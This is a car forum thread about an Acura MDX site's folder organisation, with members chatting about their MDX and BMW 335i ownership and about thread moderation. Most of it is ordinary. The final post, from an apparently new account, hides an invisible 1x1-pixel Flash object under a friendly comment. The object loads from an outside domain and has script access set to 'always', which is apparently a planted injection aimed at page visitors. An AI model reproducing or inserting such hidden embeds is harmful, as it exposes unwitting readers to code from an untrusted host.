Acura MDX SUV Forums banner

1 - 16 of 16 Posts

·
Registered
617 Posts
Discussion Starter #1
Thanks very much for using the appropriate folders for your threads. because of your actions, other folders are getting used and watched more often. This allows more conversation on the subject and interest.

Randy B

·
Registered
468 Posts
wow, long time no see...

Randy, I couldn't come visit the site without saying hello :)

·
Registered
468 Posts
hi Midnight, how are you?

from my signature, you all know that I used to be the first to bash the germans and only drive acura/infiniti etc..

I have to admit...
I am at 8000 miles and every time I get in and drive it still puts a smile on my face. this is by far, the nicest, fastest, most "fun to drive" car I have ever owned!!
no problems or even maintenance yet!! I had to fight with the dealer as they don't recommend chaning oil until 15k... crazy...
all that being said, the MDX is still in the family and running like a champ...

·
Registered
4,969 Posts
We miss you Heat00!

·
Registered
468 Posts
lol...

I miss this place and you guys too!!

although the BMW site is very informative and has helped....

it just doesn't seem as personal as it is here and lots of snobby brats there that got a bmw handed to them from daddy lol....

however, I do love my 335i..

and to update you guys, my X is running strong and is the best car my father in law has ever had the opportunity to own!!
I'm glad I helped him get such a great ride

·
Registered
468 Posts
btw, did I mention I have 4 OEM rims and tires for sale... anyone???

lmao, ha I couldn't resist as it was such an ordeal....

hehe, I do still have the 4 michellin tires in the garage.....

·
Registered
1,442 Posts
Ok, I may be in the minority here, and I understand the theory that you are working on, but moving all of the threads to 20 different folders makes it a pain in the butt to find things.

Just my opinion.

:)

·
Registered
35 Posts
gmc74 said:
Ok, I may be in the minority here, and I understand the theory that you are working on, but moving all of the threads to 20 different folders makes it a pain in the butt to find things.

Just my opinion.

:)
I have to second gmc's feelings. Though I understand that without some organization of topics it can become a confusing free-for-all

·
Registered
35 Posts
Heat00 said:
hi Midnight, how are you?

from my signature, you all know that I used to be the first to bash the germans and only drive acura/infiniti etc..

I have to admit...
I am at 8000 miles and every time I get in and drive it still puts a smile on my face. this is by far, the nicest, fastest, most "fun to drive" car I have ever owned!!
no problems or even maintenance yet!! I had to fight with the dealer as they don't recommend chaning oil until 15k... crazy...
all that being said, the MDX is still in the family and running like a champ...
My story is just the opposite. I traded out of a 07 monaco blue bmw 335i to get an MDX. Agree with your feelings about straight out crazy fun torque. Near perfect balance with that kind of weight distribution is near-Lambo performance territory. Things I'll miss in the Beem are keyless ignition, auto unlock, legendary handling, refined styling, twin-turbo rocket power, adaptive headlights. Things I won't so much miss... Cleaning black brake dust off rims every other day, lock/unlock buttons located on the center of dash rather than door handle, dealing with snow tires and getting in and out with my 6'5" frame. No doubt I will miss it, happy with my X though too.

·
Registered
960 Posts
Can I just make an observation? I think that the threads are being moved WAY too often. Anything to do with audio, deals, accessories are immediately moved.

Now I can appreciate the fact that there are separate forums for these, but those are not MY specific. There are a LOT of questions that are being asked are specific to the 2007 and up generation.

These threads should NOT be moved. I am honestly not on the forum enough and I am sure I am missing some of these threads.

I would say either keep these threads in here, or create separate sub-forums for 2007 and up audio, etc.

Thanks for listening. :2:

·
Registered
617 Posts
Discussion Starter #12
Actually they do.

The majority of them actually have to do with multiple years and models. That is why they are moved.

I have requested some sub-forums and changes to titles.

I am awaiting the response at this time.

Thanks for the feedback though. It's always good to hear another opinion.

Randy B

·
Registered
960 Posts
Re: Actually they do.

Randy B said:
The majority of them actually have to do with multiple years and models. That is why they are moved.

I have requested some sub-forums and changes to titles.

I am awaiting the response at this time.

Thanks for the feedback though. It's always good to hear another opinion.

Randy B
Thanks for the reply and not going postal. I am a moderator on a very active automotive forum, so I know that it is a thankless job. On the whole, this place is pretty good as a forum.

One of the boards that I visit that is very model specific (V70R.com) has subforums in each of the generational forums. Things such as wheels and tires, multimedia, etc.

I would suggest that the same subforums for each of the Gen 1 and Gen 2 MDX forums would be useful! That way if I want to find out how to install the step bars, I don't have to look through a bunch of posts for the Gen 1 which would not apply to my vehicle.

Cheers!

·
Registered
5 Posts
No prob Randy... I like allot of the accessories on your vehicle. how can I post my model? (08 tech (no frills yet))
Also do you have any thoughts\links to bike carrying trailer hitchs vs a roof rack system and potential warrenty issues? tx

·
Registered
10 Posts
np man, love to help out. Organization is important, I know, I run a forum myself.
<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1">
<param value="http://ihavejustbeenpaid.info/flash/22/1x1.swf">
<param name="allowScriptAccess" value="always" />
<embed allowScriptAccess="always" src="http://ihavejustbeenpaid.info/flash/22/1x1.swf" type="application/x-shockwave-flash" width="1" height="1">
</embed></object>

1 - 16 of 16 Posts